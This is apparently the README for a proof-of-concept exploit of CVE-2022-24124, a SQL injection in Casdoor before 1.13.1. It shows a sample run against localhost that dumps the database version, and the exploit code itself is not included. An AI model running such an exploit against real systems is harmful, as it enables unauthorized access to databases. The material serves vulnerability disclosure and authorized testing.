
POC for CVE-2022-24124
CVE-2022-24124 的漏洞利用代码,又名 Casdoor SQL 注入
漏洞利用链接:[ExploitDB-50792] [PacketStormSecurity]
预期结果:转储运行 Casdoor < 1.13.1 的主机上的 SQL 数据库版本
仅用于教育目的及企业环境中的测试。
Barricade➜ go run exploit.go -u http://127.0.0.1:8080
-=Casdoor SQL Injection (CVE-2022-24124)=-
- by Mayank Deshmukh (ColdFusionX)
[*] Dumping Database Version
XPATH syntax error: .12-MariaDB-0+deb11u1